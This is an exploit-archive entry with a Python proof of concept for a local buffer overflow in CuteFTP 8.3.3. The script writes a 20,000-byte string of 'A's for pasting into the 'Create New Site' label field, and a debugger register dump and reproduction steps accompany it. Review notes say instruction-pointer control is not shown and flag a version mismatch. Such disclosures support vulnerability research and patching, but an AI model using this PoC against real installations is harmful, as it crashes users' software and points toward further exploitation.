ID PACKETSTORM:81663 Type packetstorm Reporter Dr_IDE Modified 2009-09-26T00:00:00
Description
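#!/usr/bin/env python
#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By: Dr_IDE
# Download: http://www.cuteftp.com/downloads/
# Tested On: Windows 7 RC, XP might be more shell friendly
# Notes: This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
#        Because of differences in the internal process of each site type you may be able to get
#        execution through one of these channels.
#
# What this script does: it writes a 20000-byte run of 0x41 ("A") to CuteFTP.txt and prints the
# manual reproduction steps. It opens no sockets and never touches the CuteFTP process; the
# crash is triggered by hand through the GUI.
#
# Triage notes, read from the register dump below:
#   - EDX and EDI contain 0x41414141 and ECX points at a run of "A" characters, so the pasted
#     data was present in registers when the fault was captured.
#   - EIP is 77843913 inside ntdll, not 0x41414141. The dump documents a crash; control of the
#     instruction pointer is not demonstrated by this listing.
#   - NOTE(review): this header says v8.3.3 while the banner printed at the end says v8.3.2;
#     confirm the affected version range before relying on either.
#   - NOTE(review): an overflow of this kind suggests the label text is copied without a length
#     bound; a patched build should reject or truncate over-long labels. Not verifiable from
#     this listing alone.
#
#####################################################################################################

"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""

# Test string: 20000 bytes of 0x41, used as the over-long site label.
buff = "\x41" * 20000

try:
    # The context manager closes the handle even if write() raises.
    with open("CuteFTP.txt", "w") as f1:
        f1.write(buff)
except IOError:
    # Only file creation/write failures are expected here. A bare `except:` would also
    # swallow KeyboardInterrupt and genuine programming errors.
    print("[-] Error. File couldn't be created.")
else:
    # Single-argument print(...) produces the same output under Python 2 and Python 3.
    print("\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC")
    print("By: Dr_IDE")
    print("\nFile Created Successfully.\n")
    print("Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom.")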
{"hash": "30dd0b31bcd748c9b9fe115bbb98190c727cd89d21b87529737994d29c0dd59b", "sourceHref": "https://packetstormsecurity.com/files/download/81663/Dr_IDE-CuteFTP_FTP_8.3.3-PoC.py.txt", "title": "CuteFTP 8.3.3 Buffer Overflow", "id": "PACKETSTORM:81663", "published": "2009-09-26T00:00:00", "description": "", "modified": "2009-09-26T00:00:00", "sourceData": "`#!/usr/bin/env python \n \n##################################################################################################### \n# \n# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC \n# Found By: Dr_IDE \n# Download: http://www.cuteftp.com/downloads/ \n# Tested On: Windows 7 RC, XP might be more shell friendly \n# Notes: This PoC exploits the \"Create New Site\" mechanism. Any site type that you pick will work. \n# Because of differences in the internal process of each site type you may be able to get \n# execution through one of these channels. \n# \n##################################################################################################### \n \n\"\"\" \nEAX 02120000 \nECX 0228BA90 ASCII \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nEDX 41414141 \nEBX 00004141 \nESP 0018C160 \nEBP 0018C230 \nESI 0228BA88 \nEDI 41414141 \nEIP 77843913 ntdll.77843913 \nC 0 ES 002B 32bit 0(FFFFFFFF) \nP 0 CS 0023 32bit 0(FFFFFFFF) \nA 1 SS 002B 32bit 0(FFFFFFFF) \nZ 0 DS 002B 32bit 0(FFFFFFFF) \nS 0 FS 0053 32bit 7EFDD000(FFF) \nT 0 GS 002B 32bit 0(FFFFFFFF) \nD 0 \nO 0 LastErr ERROR_SUCCESS (00000000) \nEFL 00010212 (NO,NB,NE,A,NS,PO,GE,G) \nST0 empty -??? FFFF 000000FF 00FF00FF \nST1 empty -??? FFFF 00000000 00008200 \nST2 empty -??? 
FFFF 00010000 00010000 \nST3 empty 431.99999034404754640 \nST4 empty 1.0000000000000000000 \nST5 empty 1.0000000000000000000 \nST6 empty 16.000000000000000000 \nST7 empty 16.000000000000000000 \n3 2 1 0 E S P U O Z D I \nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ) \nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 \n \n\"\"\" \n \nbuff = (\"\\x41\" * 20000) \n \ntry: \nf1 = open(\"CuteFTP.txt\",\"w\"); \nf1.write(buff); \nf1.close(); \n \nprint \"\\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC\" \nprint \"By: Dr_IDE\" \nprint \"\\nFile Created Successfully.\\n\" \nprint \"Usage:\\n [-] Click File\\n [-] Create New FTP Site\\n [-] Paste String into Label Field\\n [-] Enter anything for Address\\n [-] Click Connect\\n [-] Boom.\" \nexcept: \nprint \"[-] Error. File couldn't be created.\"`\n", "reporter": "Dr_IDE", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "59c2697edec13f988f86d42522a78d88"}, {"key": "modified", "hash": "6cd4ae2f205d2768ce79e832bc7d6c29"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "6cd4ae2f205d2768ce79e832bc7d6c29"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4385384597b3adc5c7bfb5872411d1a2"}, {"key": "sourceData", "hash": "c5284d04e867369a3a5d88b7d1cc8ed1"}, {"key": "sourceHref", "hash": "c5f5a90cd821fd6e6a27df430fd68ff6"}, {"key": "title", "hash": "5f50a79c350857977b1ebf56ee2964a6"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": 
"https://packetstormsecurity.com/files/81663/CuteFTP-8.3.3-Buffer-Overflow.html", "lastseen": "2016-11-03T10:22:38", "viewCount": 0, "enchantments": {"vulnersScore": 4.0}}